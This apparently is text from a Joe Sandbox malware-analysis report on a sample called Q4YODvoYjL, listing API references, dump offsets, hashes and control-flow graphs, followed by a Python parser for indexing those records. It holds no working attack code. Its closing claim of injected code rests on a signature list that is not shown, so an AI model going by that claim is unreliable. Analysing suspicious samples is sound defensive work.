                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b035c11de4d02bfcfd7edfe64c2420f894aba0ba53e1836a57489dadaa6db25b
                                                                                  • Instruction ID: 0784f06cdd134582f2d5f878f6010d0031c1c8d2e18f01c894743f8b01e48897
                                                                                  • Opcode Fuzzy Hash: b035c11de4d02bfcfd7edfe64c2420f894aba0ba53e1836a57489dadaa6db25b
                                                                                  • Instruction Fuzzy Hash: BDC12BF1C9174ACBDB20DF65E8881893BB1BB453ACF905B08D2616F6D0D7B8246ACF54
                                                                                   Uniqueness Score: -1.00%

                                                                                   Execution Graph

                                                                                   Execution Coverage: 7.9%
                                                                                   Dynamic/Decrypted Code Coverage: 100%
                                                                                   Signature Coverage: 10%
                                                                                   Total number of Nodes: 30
                                                                                   Total number of Limit Nodes: 3
                                                                                   [execution graph rendering omitted: 30 nodes rooted at 538e448, d75a10, d7f610 and 66099f8; API calls CreateWindowExW, LoadLibraryA, GetUserNameW, GlobalMemoryStatusEx]

                                                                                   Control-flow Graph

                                                                                   [control-flow graph rendering omitted: basic blocks d7f610-d7f7c8; calls GetUserNameW]
                                                                                  APIs
                                                                                  • GetUserNameW.ADVAPI32(00000000,00000000), ref: 00D7F74B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563462032.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d70000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameUser
                                                                                  • String ID:
                                                                                  • API String ID: 2645101109-0
                                                                                  • Opcode ID: ee8412847519d49dcb63850444c590c99edc73d2507b44e01ee0aae377f0f632
                                                                                  • Instruction ID: c2b9ab02d767843b1d363fcff525eb7781f029682a07b9f444a5de272340394d
                                                                                  • Opcode Fuzzy Hash: ee8412847519d49dcb63850444c590c99edc73d2507b44e01ee0aae377f0f632
                                                                                  • Instruction Fuzzy Hash: 07510875D00218CFDB18CFA9C88579DBBB1BF48310F15812AE819AB355EB74A844CFA4
                                                                                   Uniqueness Score: -1.00%

                                                                                   Control-flow Graph

                                                                                   [control-flow graph rendering omitted: entry 538f171, basic blocks 538f13c-538f441; calls 538c73c and CreateWindowExW]
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.568976355.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_5380000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4a1e4d4c52f1a77c59b36ac18ff8a7fbe386f1f849b11f20d787c9639940efb7
                                                                                  • Instruction ID: 8d04eda17940dee16382daadbee0a3f1a134ae703a369a3683831b1893dd1b3c
                                                                                  • Opcode Fuzzy Hash: 4a1e4d4c52f1a77c59b36ac18ff8a7fbe386f1f849b11f20d787c9639940efb7
                                                                                  • Instruction Fuzzy Hash: DF919DB5D09388AFCB06DFA5C8509EDBFB5BF4A300F19819BE444AB262D3749845CF61
                                                                                   Uniqueness Score: -1.00%

                                                                                   Control-flow Graph

                                                                                   [control-flow graph rendering omitted: basic blocks d7f604-d7f7c8; calls GetUserNameW]
                                                                                  APIs
                                                                                  • GetUserNameW.ADVAPI32(00000000,00000000), ref: 00D7F74B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563462032.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d70000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameUser
                                                                                  • String ID:
                                                                                  • API String ID: 2645101109-0
                                                                                  • Opcode ID: e7292d9582d54bbe08dcad4e7e4e9d536f8bbbc3f11ef616e354c13ae7cf20ff
                                                                                  • Instruction ID: cf22ac4265f1f615a08f8bafc33240be9014f7277a421a7ccddbf2241bffe021
                                                                                  • Opcode Fuzzy Hash: e7292d9582d54bbe08dcad4e7e4e9d536f8bbbc3f11ef616e354c13ae7cf20ff
                                                                                  • Instruction Fuzzy Hash: 8A511875D10218CFDB18CFA9C885BDDBBB1FF48314F14812AE819AB355EB74A845CBA4
                                                                                   Uniqueness Score: -1.00%

                                                                                   Control-flow Graph

                                                                                   [control-flow graph rendering omitted: basic blocks 660bc68-660bde5; calls 660a03c, 660a048 and GlobalMemoryStatusEx]
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.569488643.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_6600000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 33a02806c7cab2ba001ca96d46ac42c0e5478b758fbc4d6a69ce9b6290c044b2
                                                                                  • Instruction ID: 44ac35c972cb36908c6c375f7155f494a0f76213f641eca08672b93b9bca12bd
                                                                                  • Opcode Fuzzy Hash: 33a02806c7cab2ba001ca96d46ac42c0e5478b758fbc4d6a69ce9b6290c044b2
                                                                                  • Instruction Fuzzy Hash: 2741E172E043958FDB14DFA9D8142DFFFB1AF89310F14866AD445A7281DB789844CBA1
                                                                                   Uniqueness Score: -1.00%

                                                                                   Control-flow Graph

                                                                                   [control-flow graph rendering omitted: basic blocks 538c720-538f441; calls CreateWindowExW]
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0538F3E2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.568976355.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_5380000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 8997e615d4de22b58e3ec5266c056130c0760f3f0a22db868c90c11cce65f325
                                                                                  • Instruction ID: 1035b21c9169e070821df12fbec7ea4f55a343bddcc87c5d0a17f6b39ad91e1e
                                                                                  • Opcode Fuzzy Hash: 8997e615d4de22b58e3ec5266c056130c0760f3f0a22db868c90c11cce65f325
                                                                                  • Instruction Fuzzy Hash: D551F3B1D043499FDB15DFA9C880ADEBFB5BF48314F24812AE819AB211D7749845CF90
                                                                                   Uniqueness Score: -1.00%

                                                                                   Control-flow Graph

                                                                                   [control-flow graph rendering omitted: basic blocks 538f2c4-538f441; calls CreateWindowExW]
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0538F3E2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.568976355.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_5380000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 8f5358a0eb7abbf5e476569837572d31a2038c03eba7fffcce96fc0634fbf752
                                                                                  • Instruction ID: 4387311692ffa4fea6d63152ac592620c5fc54e2d28e48bd38911368fb0858b4
                                                                                  • Opcode Fuzzy Hash: 8f5358a0eb7abbf5e476569837572d31a2038c03eba7fffcce96fc0634fbf752
                                                                                  • Instruction Fuzzy Hash: E751B2B5D043499FDB15DFA9C884ADEBFB5FF88310F24812AE819AB210D7B49945CF90
                                                                                   Uniqueness Score: -1.00%

                                                                                   Control-flow Graph

                                                                                   [control-flow graph rendering omitted: basic blocks 538c73c-538f441; calls CreateWindowExW]
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0538F3E2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.568976355.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_5380000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 7b570a87798d1d986f743d866e6e52db99e7a5e6226cceb57dd0f8a9bec08707
                                                                                  • Instruction ID: 81ce06688aee3dd183e8a97c8006b3f6c92e40944293962a24b871e9a5d3331e
                                                                                  • Opcode Fuzzy Hash: 7b570a87798d1d986f743d866e6e52db99e7a5e6226cceb57dd0f8a9bec08707
                                                                                  • Instruction Fuzzy Hash: 8A5193B1D103499FDB14DF9AC884ADEBBB5FF48314F24812AE819AB214D7B4A945CF90
                                                                                   Uniqueness Score: -1.00%

                                                                                   Control-flow Graph

                                                                                   [control-flow graph rendering omitted: basic blocks d77525-d77672; calls LoadLibraryA]
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 00D77617
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563462032.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d70000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 7fbfcb96d0e46c0b0957d7fa454604aec9e0673d7147b22213e2df851fe4d65e
                                                                                  • Instruction ID: 3b7d341930195a2191a64d3d4f86aecc4e8f67c5004c278ccc7bcdda3e55bc7d
                                                                                  • Opcode Fuzzy Hash: 7fbfcb96d0e46c0b0957d7fa454604aec9e0673d7147b22213e2df851fe4d65e
                                                                                  • Instruction Fuzzy Hash: 38416AB0D046498FDB10CFA9C8817DDBBF1EB48310F14852AD819EB384E7749846CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 236 d7489c-d77587 238 d775db-d77627 LoadLibraryA 236->238 239 d77589-d775ae 236->239 242 d77630-d77661 238->242 243 d77629-d7762f 238->243 239->238 244 d775b0-d775b2 239->244 249 d77663-d77667 242->249 250 d77671 242->250 243->242 246 d775d5-d775d8 244->246 247 d775b4-d775be 244->247 246->238 251 d775c2-d775d1 247->251 252 d775c0 247->252 249->250 254 d77669 249->254 255 d77672 250->255 251->251 253 d775d3 251->253 252->251 253->246 254->250 255->255
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 00D77617
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563462032.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d70000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 0b864036f2bdce4fda647313693ebea09e249fe8f7fe8d3f6c0f6d871aa720fa
                                                                                  • Instruction ID: ee461e1d3305be3d4c92327959c4653436a878ed632a9d32c1cdac27818dd24e
                                                                                  • Opcode Fuzzy Hash: 0b864036f2bdce4fda647313693ebea09e249fe8f7fe8d3f6c0f6d871aa720fa
                                                                                  • Instruction Fuzzy Hash: C3416BB0D046599FDB10CFA9C88579DBBF1EB48314F14C92AE819EB384E7749845CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 877 660a048-660bdb4 GlobalMemoryStatusEx 880 660bdb6-660bdbc 877->880 881 660bdbd-660bde5 877->881 880->881
                                                                                  APIs
                                                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0660BCBA), ref: 0660BDA7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.569488643.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_6600000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: GlobalMemoryStatus
                                                                                  • String ID:
                                                                                  • API String ID: 1890195054-0
                                                                                  • Opcode ID: e0fb36bcdb9cab5cb82bcb0b933bc3f594f99bee75364488086a51d998607447
                                                                                  • Instruction ID: 36eb30c6e8d4be56506c5509f380eb6f34141c2cec62657ab616dd6e2e4fa88c
                                                                                  • Opcode Fuzzy Hash: e0fb36bcdb9cab5cb82bcb0b933bc3f594f99bee75364488086a51d998607447
                                                                                  • Instruction Fuzzy Hash: 441100B1C0061A9FDB50CF9AC844BDEFBB4EB48720F14816AD818B7280D778A944CFE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563335544.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d0d000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fe9266b7d432994292a33d5ca99bbe4e4b7b98a7daab438b32ec73e6adc13610
                                                                                  • Instruction ID: a0fe8646b9ac1608e72f811096c3107e59642d1c270680992ee28c072ee77420
                                                                                  • Opcode Fuzzy Hash: fe9266b7d432994292a33d5ca99bbe4e4b7b98a7daab438b32ec73e6adc13610
                                                                                  • Instruction Fuzzy Hash: 53213A71504340EFDB05CFA4D9C0B27BF66FB88320F24856AE8490B286C336D856DBB5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563335544.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d0d000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 250c5c434f3b5270dbb7dc43245548b4ff86b059e3bd0580af821b6809a433bb
                                                                                  • Instruction ID: 4950814dbf77a1002b16b873e8404de974c85caa55f55b959eb7c45ab680b27b
                                                                                  • Opcode Fuzzy Hash: 250c5c434f3b5270dbb7dc43245548b4ff86b059e3bd0580af821b6809a433bb
                                                                                  • Instruction Fuzzy Hash: F8212871504240DFDB05CF54D9C4B16BF66FB98328F24856AEC490B286C336D846D7B1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563369321.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d1d000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cb2b1a9aa844d41c51807ef27cd5e2142ed4f2f9b633652a39c1b232283b62f5
                                                                                  • Instruction ID: 7f8a073c5845c67f9cd34d14cb4bd568d1f6ee294d2757fcefef2929dff23061
                                                                                  • Opcode Fuzzy Hash: cb2b1a9aa844d41c51807ef27cd5e2142ed4f2f9b633652a39c1b232283b62f5
                                                                                  • Instruction Fuzzy Hash: BF213775508240EFCB10DF14E9C0B56BBA2FB88314F34C669E8490B246CB36D887DB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563369321.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d1d000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fd925f3798c918c86359b7366f3d520e11073821dc654603ba7b8ad3f8d00d4f
                                                                                  • Instruction ID: f1a84428b3f869369811f25823137de9f015490314d03538a144a0f8cc5b03f7
                                                                                  • Opcode Fuzzy Hash: fd925f3798c918c86359b7366f3d520e11073821dc654603ba7b8ad3f8d00d4f
                                                                                  • Instruction Fuzzy Hash: 3A215C7154D7C09FDB038F24D990B11BF71AB46214F2985EBD8848F2A7C33A985ACB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563335544.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d0d000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f906f83a178082e7d7d0a07ac00f86b8a262bd51881fd340313f04e9881f9409
                                                                                  • Instruction ID: 83a923b518c32e1a371e9a99d948576d87249235a1d1c6c3090e3c4a08cf3edb
                                                                                  • Opcode Fuzzy Hash: f906f83a178082e7d7d0a07ac00f86b8a262bd51881fd340313f04e9881f9409
                                                                                  • Instruction Fuzzy Hash: 0121B476504280DFCB06CF54D9C4B16BF72FB84324F28C6AADC080B656C336D856CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563335544.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d0d000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                  • Instruction ID: 05223f5ae09964c1e94c6190638c56723a4c75251d8137e8b7304bcd35af94b4
                                                                                  • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                  • Instruction Fuzzy Hash: 6711E676504280CFCB16CF54D9C4B16BF72FB95324F28C6AADC090B656C33AD856CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563335544.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d0d000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4d7f7c3c03395ac89322ff69c2fcd29de74e2d544fea6dd5b6e4c35dedd9affa
                                                                                  • Instruction ID: 3f4caf9ac14869aa2e0bebdb4e6d94e58d2f93145c86fd340e5ba2689116058b
                                                                                  • Opcode Fuzzy Hash: 4d7f7c3c03395ac89322ff69c2fcd29de74e2d544fea6dd5b6e4c35dedd9affa
                                                                                  • Instruction Fuzzy Hash: EE01F771908384AAE7108A99CC84762BF98EF41730F1CC45BED491F2C6C378DC44DAB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.563335544.0000000000D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D0D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_d0d000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b4182fc41ae3a74456235ef06c1907d475f4f779aaeba7d6d3cb7799a4a85b75
                                                                                  • Instruction ID: 33a18aff26a7f1814add564a517d9378a394d79096cee406101ba83c15867dd8
                                                                                  • Opcode Fuzzy Hash: b4182fc41ae3a74456235ef06c1907d475f4f779aaeba7d6d3cb7799a4a85b75
                                                                                  • Instruction Fuzzy Hash: 2FF06271904284AEE7118A5ADC84B62FFA8EF91774F18C55AED085F286C379DC44CAB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 05383E58
                                                                                  • GetCurrentThread.KERNEL32 ref: 05383E95
                                                                                  • GetCurrentProcess.KERNEL32 ref: 05383ED2
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 05383F2B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.568976355.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_5380000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Current$ProcessThread
                                                                                  • String ID:
                                                                                  • API String ID: 2063062207-0
                                                                                  • Opcode ID: d1919f66b585a125e23875a948289a7adfae7f72d9d189131aaae6197f187a8e
                                                                                  • Instruction ID: 1e520a34abe00ebee1f74b6c3fee68b33d8eeb8c4a3b25fd92dcba9f51df600e
                                                                                  • Opcode Fuzzy Hash: d1919f66b585a125e23875a948289a7adfae7f72d9d189131aaae6197f187a8e
                                                                                  • Instruction Fuzzy Hash: 105156B09003498FDB14DFAAD9887EEBFF1BF88704F208569E419A7350D775A884CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 05383E58
                                                                                  • GetCurrentThread.KERNEL32 ref: 05383E95
                                                                                  • GetCurrentProcess.KERNEL32 ref: 05383ED2
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 05383F2B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.568976355.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_5380000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Current$ProcessThread
                                                                                  • String ID:
                                                                                  • API String ID: 2063062207-0
                                                                                  • Opcode ID: fac0bb656d7073d9c36cf3fe3e0bb55e293124d31fc3a80e5b30906d684d2291
                                                                                  • Instruction ID: d5f0757ae4365a1e6ea1af9eeca653d5311837b34207bd8062e2db2e05cc70d0
                                                                                  • Opcode Fuzzy Hash: fac0bb656d7073d9c36cf3fe3e0bb55e293124d31fc3a80e5b30906d684d2291
                                                                                  • Instruction Fuzzy Hash: 955146B09003498FDB14DFAAD9887EEBBF1FF88704F208569E419A7350D775A884CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%
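The records above are the per-function metadata Joe Sandbox emits for each function it disassembled from a memory dump: the API references with their call-site addresses, the dump region and offset the function was lifted from, the IDA snapshot, the flattened control-flow graph, and the Opcode/Instruction IDs and fuzzy hashes used by the Similarity feature. When a report is saved as text those records are tedious to pivot on by hand. The parser below is an added example and is not part of this report or of Joe Sandbox's own tooling; it turns the records into Python objects so the API list, dump offset, basic blocks and Opcode ID of each function can be indexed and compared across reports. Its sample input is copied (abridged) from two of the records above and is labelled as constructed; treating the Uniqueness Score line as the record terminator, and the block/edge layout assumed for the control_flow_graph line, are inferences from the visible text rather than a documented format.

```python
"""Parse the per-function records of a Joe Sandbox "Disassembly" section
(report saved as text) into objects, so API references, memory-dump sources,
control-flow blocks and Opcode IDs can be pivoted on across reports.
Added example, not Joe Sandbox code.  Field names come from the report text;
using the "Uniqueness Score" line as record terminator is an assumption."""
import re
from dataclasses import dataclass, field

API_RE = re.compile(r"^(\w+)\.(\w+)(?:\((.*)\))?,? ref: ([0-9A-Fa-f]+)$")
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
FIELD_RE = re.compile(r"^• ([^:]+): ?(.*)$")

# Constructed sample: two records copied (abridged) from the report above.
SAMPLE = """\
control_flow_graph 877 660a048-660bdb4 GlobalMemoryStatusEx 880 660bdb6-660bdbc 877->880 881 660bdbd-660bde5 877->881 880->881
APIs
• GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0660BCBA), ref: 0660BDA7
• Source File: 00000001.00000002.569488643.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
• Snapshot File: hcaresult_1_2_6600000_Q4YODvoYjL.jbxd
• API ID: GlobalMemoryStatus
• String ID:
• Opcode ID: e0fb36bcdb9cab5cb82bcb0b933bc3f594f99bee75364488086a51d998607447
Uniqueness Score: -1.00%
APIs
• GetCurrentProcess.KERNEL32 ref: 05383E58
• GetCurrentThread.KERNEL32 ref: 05383E95
• GetCurrentProcess.KERNEL32 ref: 05383ED2
• GetCurrentThreadId.KERNEL32 ref: 05383F2B
• Source File: 00000001.00000002.568976355.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
• Snapshot File: hcaresult_1_2_5380000_Q4YODvoYjL.jbxd
• Opcode ID: d1919f66b585a125e23875a948289a7adfae7f72d9d189131aaae6197f187a8e
Uniqueness Score: -1.00%
"""


@dataclass
class Block:
    ident: int      # node number in the flattened graph text
    start: str      # first address of the basic block (hex string)
    end: str        # last address; equals start for single-address nodes
    api: str = ""   # API the graph labels this block with, if any


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)    # (name, module, args, ref)
    fields: dict = field(default_factory=dict)  # "Opcode ID", "Offset", ...
    blocks: list = field(default_factory=list)
    edges: list = field(default_factory=list)   # (from_id, to_id)


def parse_cfg(tokens):
    """Rebuild blocks and edges from the flattened control_flow_graph line.
    Layout assumed: '<id> <start>[-<end>] [ApiName]' introduces a block and
    '<a>-><b>' is an edge; the two kinds are interleaved."""
    blocks, edges, i = [], [], 0
    while i < len(tokens):
        m = EDGE_RE.match(tokens[i])
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        start, _, end = tokens[i + 1].partition("-")
        blk = Block(int(tokens[i]), start, end or start)
        i += 2
        if i < len(tokens) and not EDGE_RE.match(tokens[i]) and not tokens[i].isdigit():
            blk.api = tokens[i]       # e.g. LoadLibraryA, GlobalMemoryStatusEx
            i += 1
        blocks.append(blk)
    return blocks, edges


def parse_records(text):
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("control_flow_graph "):
            cur.blocks, cur.edges = parse_cfg(line.split()[1:])
        elif line.startswith("Uniqueness Score:"):
            cur.fields["Uniqueness Score"] = line.split(":", 1)[1].strip()
            records.append(cur)
            cur = FunctionRecord()
        elif line.startswith("• "):
            m = API_RE.match(line[2:])
            if m:
                name, module, args, ref = m.groups()
                cur.apis.append((name, module, args or "", ref))
                continue
            f = FIELD_RE.match(line)
            if f:
                key, val = f.groups()
                parts = val.split(", ")  # "Source File" also carries Offset / PE flag
                cur.fields[key] = parts[0]
                for extra in parts[1:]:
                    k, _, v = extra.partition(": ")
                    cur.fields[k] = v
    return records


def index_by_opcode_id(records):
    """Opcode ID -> record: the key to match a function against other reports."""
    return {r.fields["Opcode ID"]: r for r in records if "Opcode ID" in r.fields}


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.fields.get("Offset"), [a[0] for a in rec.apis], len(rec.blocks), "blocks")
```

On this page the Opcode ID and Opcode Fuzzy Hash of every record carry the same value, so either field can serve as the pivot key; the Instruction Fuzzy Hash differs between otherwise identical records (compare the two GetCurrentProcess/GetCurrentThread functions at offset 05380000) and is the better field for spotting near-duplicate code. The "based on PE: false" flag on every record here means the functions were lifted from a raw memory region rather than a mapped PE image, which is consistent with the injected-code behaviour the report's signature list describes.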